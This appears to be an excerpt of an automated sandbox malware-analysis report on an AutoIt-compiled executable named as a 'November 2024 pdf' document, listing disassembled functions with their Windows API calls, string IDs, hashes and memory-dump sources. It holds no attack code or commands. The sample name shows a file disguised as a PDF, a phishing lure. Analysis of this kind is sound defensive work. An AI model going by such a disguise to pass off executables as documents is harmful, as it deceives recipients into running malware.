                                                                                                                      • Opcode Fuzzy Hash: 7bca660fa5059cf1eddb3e2f3f75006e00a17f595bd3d16dd4b9c06a8661cabe
                                                                                                                      • Instruction Fuzzy Hash: A481F4B0640345EACF24BA30CC87FEE7768AF15741F548025FD45AB182EBACDA49D391
                                                                                                                      Function 007DAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 007DAB99
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 007DAB9D
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 007DABB3
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 007DABBE
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 007DABC3
                                                                                                                      • GetSysColor.USER32(00000011), ref: 007DABDB
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DABE9
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 007DABFA
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 007DAC03
                                                                                                                      • SelectObject.GDI32(?,?), ref: 007DAC10
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 007DAC2F
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DAC46
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 007DAC5B
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DACA7
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007DACCE
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 007DACEC
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 007DACF7
                                                                                                                      • GetSysColor.USER32(00000011), ref: 007DAD05
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 007DAD0D
                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007DAD21
                                                                                                                      • SelectObject.GDI32(?,007DA869), ref: 007DAD38
                                                                                                                      • DeleteObject.GDI32(?), ref: 007DAD43
                                                                                                                      • SelectObject.GDI32(?,?), ref: 007DAD49
                                                                                                                      • DeleteObject.GDI32(?), ref: 007DAD4E
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 007DAD54
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 007DAD5E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996641542-0
                                                                                                                      • Opcode ID: 4dc25f77b1e8989d618affb09e4558dbda949a1da7ed41bab61603c348ca263f
                                                                                                                      • Instruction ID: c76b3800723c062a1a7b91d957ba0b25f4a7700233607ff85dcb693cbe3cc70b
                                                                                                                      • Opcode Fuzzy Hash: 4dc25f77b1e8989d618affb09e4558dbda949a1da7ed41bab61603c348ca263f
                                                                                                                      • Instruction Fuzzy Hash: 07614E71901218FFDF119FA4DC48EAE7BB9FB08320F148126F916AB2A1D7799D40DB90
                                                                                                                      Function 007D8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007D8D34
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8D45
                                                                                                                      • CharNextW.USER32(0000014E), ref: 007D8D74
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007D8DB5
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007D8DCB
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8DDC
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007D8DF9
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 007D8E45
                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007D8E5B
                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D8E8C
                                                                                                                      • _memset.LIBCMT ref: 007D8EB1
                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007D8EFA
                                                                                                                      • _memset.LIBCMT ref: 007D8F59
                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007D8F83
                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 007D8FDB
                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 007D9088
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 007D90AA
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D90F4
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D9121
                                                                                                                      • DrawMenuBar.USER32(?), ref: 007D9130
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 007D9158
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                      • Opcode ID: af0ec71f142edc1e36197579ae20bbf1915fe2d1d244c76dc5b43cb9380a6d17
                                                                                                                      • Instruction ID: 8168ca9c236495cfca747a6212305e0a195259ba76f96ffdc3c4702ac26313ab
                                                                                                                      • Opcode Fuzzy Hash: af0ec71f142edc1e36197579ae20bbf1915fe2d1d244c76dc5b43cb9380a6d17
                                                                                                                      • Instruction Fuzzy Hash: 04E17070901209EADF209F64CC88EEE7B79EF05710F108157F95AAA2D1DB789A81DF61
                                                                                                                      Function 007D4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetCursorPos.USER32(?), ref: 007D4C51
                                                                                                                      • GetDesktopWindow.USER32 ref: 007D4C66
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 007D4C6D
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 007D4CCF
                                                                                                                      • DestroyWindow.USER32(?), ref: 007D4CFB
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007D4D24
                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007D4D42
                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007D4D68
                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 007D4D7D
                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007D4D90
                                                                                                                      • IsWindowVisible.USER32(?), ref: 007D4DB0
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007D4DCB
                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007D4DDF
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007D4DF7
                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 007D4E1D
                                                                                                                      • GetMonitorInfoW.USER32(00000000,?), ref: 007D4E37
                                                                                                                      • CopyRect.USER32(?,?), ref: 007D4E4E
                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 007D4EB9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                      • Opcode ID: bafb6db0086d8652b5e73d3e287ef1d82dc4292457e25c80b2d22121e68c4a8b
                                                                                                                      • Instruction ID: 89171bd8c8a8c00b88b6e75c959864e31138ea52205fd695d88c40f755599fdd
                                                                                                                      • Opcode Fuzzy Hash: bafb6db0086d8652b5e73d3e287ef1d82dc4292457e25c80b2d22121e68c4a8b
                                                                                                                      • Instruction Fuzzy Hash: 45B14971604341EFDB04DF64C949B5ABBF5BB84310F00891AF99A9B2A1DB79E804CBA5
                                                                                                                      Function 007527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528BC
                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 007528C4
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528EF
                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 007528F7
                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0075291C
                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00752939
                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00752949
                                                                                                                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0075297C
                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00752990
                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 007529AE
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 007529CA
                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 007529D5
                                                                                                                        • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                                                                                                                        • Part of subcall function 00752344: ScreenToClient.USER32(008167B0,?), ref: 00752374
                                                                                                                        • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                                                                                                                        • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,00751256), ref: 007529FC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                      • Opcode ID: b00b88ff78b6af36c8eaeccb3446e6aa70d6386da7cb9b13d0abcd2a870cc566
                                                                                                                      • Instruction ID: babdacc71580dd8d6cf0604ee7c8c21b0835c7ad1ed51b8af6d20ce3d68fb631
                                                                                                                      • Opcode Fuzzy Hash: b00b88ff78b6af36c8eaeccb3446e6aa70d6386da7cb9b13d0abcd2a870cc566
                                                                                                                      • Instruction Fuzzy Hash: 3FB16F71A4020ADFDB15DFA8DC45BED7BB4FB08311F108229FE16E6290DB78A856CB54
                                                                                                                      Function 007D4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 007D40F6
                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007D41B6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                      • API String ID: 3974292440-719923060
                                                                                                                      • Opcode ID: 90254a2d79c4fceb9fb0bb7f61d154d6b3b93b6c3b24ad4f003ac56be77266d9
                                                                                                                      • Instruction ID: 58e87bea7be3711170950dd493fb2e259e6f33d66fa0c9e6fdadce1d1b65488b
                                                                                                                      • Opcode Fuzzy Hash: 90254a2d79c4fceb9fb0bb7f61d154d6b3b93b6c3b24ad4f003ac56be77266d9
                                                                                                                      • Instruction Fuzzy Hash: CBA1B030214301DBCB14EF24C845A6AB3B5FF84314F148969B99AAB3D2DB79FC09CB51
                                                                                                                      Function 007C52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 007C5309
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 007C5314
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 007C531F
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 007C532A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 007C5335
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 007C5340
                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 007C534B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 007C5356
                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 007C5361
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 007C536C
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 007C5377
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 007C5382
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 007C538D
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 007C5398
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 007C53A3
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 007C53AE
                                                                                                                      • GetCursorInfo.USER32(?), ref: 007C53BE
                                                                                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 007C53E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3215588206-0
                                                                                                                      • Opcode ID: 485c12c016353df056736d3db255fc47cecfadfd20b266cb51e48a47ff8414d8
                                                                                                                      • Instruction ID: 9deaa2ff084abe0c47814e5335f8f0ad7ffd8fca40318487451f43eb41be6795
                                                                                                                      • Opcode Fuzzy Hash: 485c12c016353df056736d3db255fc47cecfadfd20b266cb51e48a47ff8414d8
                                                                                                                      • Instruction Fuzzy Hash: 43415170E04319AADB109FBA8C49D6FFFB8EF51B50B10452FE509E7290DAB8A541CE61
                                                                                                                      Function 007AAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 007AAAA5
                                                                                                                      • __swprintf.LIBCMT ref: 007AAB46
                                                                                                                      • _wcscmp.LIBCMT ref: 007AAB59
                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007AABAE
                                                                                                                      • _wcscmp.LIBCMT ref: 007AABEA
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 007AAC21
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 007AAC73
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007AACA9
                                                                                                                      • GetParent.USER32(?), ref: 007AACC7
                                                                                                                      • ScreenToClient.USER32(00000000), ref: 007AACCE
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 007AAD48
                                                                                                                      • _wcscmp.LIBCMT ref: 007AAD5C
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 007AAD82
                                                                                                                      • _wcscmp.LIBCMT ref: 007AAD96
                                                                                                                        • Part of subcall function 0077386C: _iswctype.LIBCMT ref: 00773874
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                      • String ID: %s%u
                                                                                                                      • API String ID: 3744389584-679674701
                                                                                                                      • Opcode ID: 97ff642242b3e1b97310f6e6a9fd62a61926b8b63a3f5e37db90ce14424076f2
                                                                                                                      • Instruction ID: bbf00f554eb58eef581c465f48a335ed4c3e36ef6635566e12d724182ac4a7cf
                                                                                                                      • Opcode Fuzzy Hash: 97ff642242b3e1b97310f6e6a9fd62a61926b8b63a3f5e37db90ce14424076f2
                                                                                                                      • Instruction Fuzzy Hash: 78A1CE71205306FBDB18DF24C884BEAB7E8FF85355F008629F999D2590D738E945CBA2
                                                                                                                      Function 007AB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 007AB3DB
                                                                                                                      • _wcscmp.LIBCMT ref: 007AB3EC
                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 007AB414
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 007AB431
                                                                                                                      • _wcscmp.LIBCMT ref: 007AB44F
                                                                                                                      • _wcsstr.LIBCMT ref: 007AB460
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB498
                                                                                                                      • _wcscmp.LIBCMT ref: 007AB4A8
                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 007AB4CF
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB518
                                                                                                                      • _wcscmp.LIBCMT ref: 007AB528
                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 007AB550
                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 007AB5B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                      • Opcode ID: ae8c8433e30a36d58070e30d409b537d656604f0a5d02214649693913b6b2350
                                                                                                                      • Instruction ID: 206420b42ffddcba62319ce58d1a498245173ef1189d2811283cde36adf1c820
                                                                                                                      • Opcode Fuzzy Hash: ae8c8433e30a36d58070e30d409b537d656604f0a5d02214649693913b6b2350
                                                                                                                      • Instruction Fuzzy Hash: B581A0710083459BDB04DF50C885FAA7BE8FF85714F04866AFD899A0A3DB38DD49CBA1
                                                                                                                      Function 007AB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                      • Opcode ID: 754a8317e6190280cd4a412bec9720c9c68e1d1053f064aaa79285eac319ba29
                                                                                                                      • Instruction ID: 6353035a3358a954f2a415de57fea5df77be3551265b02b1a4f0a832d718f060
                                                                                                                      • Opcode Fuzzy Hash: 754a8317e6190280cd4a412bec9720c9c68e1d1053f064aaa79285eac319ba29
                                                                                                                      • Instruction Fuzzy Hash: 8831AD32A04209E6DB14EA60DD47AEE77A8BF21751F604229F8A1B11D3EF9E6E08C551
                                                                                                                      Function 007AC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000063), ref: 007AC4D4
                                                                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007AC4E6
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 007AC4FD
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 007AC512
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 007AC518
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 007AC528
                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 007AC52E
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007AC54F
                                                                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007AC569
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007AC572
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 007AC5DD
                                                                                                                      • GetDesktopWindow.USER32 ref: 007AC5E3
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 007AC5EA
                                                                                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007AC636
                                                                                                                      • GetClientRect.USER32(?,?), ref: 007AC643
                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007AC668
                                                                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007AC693
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
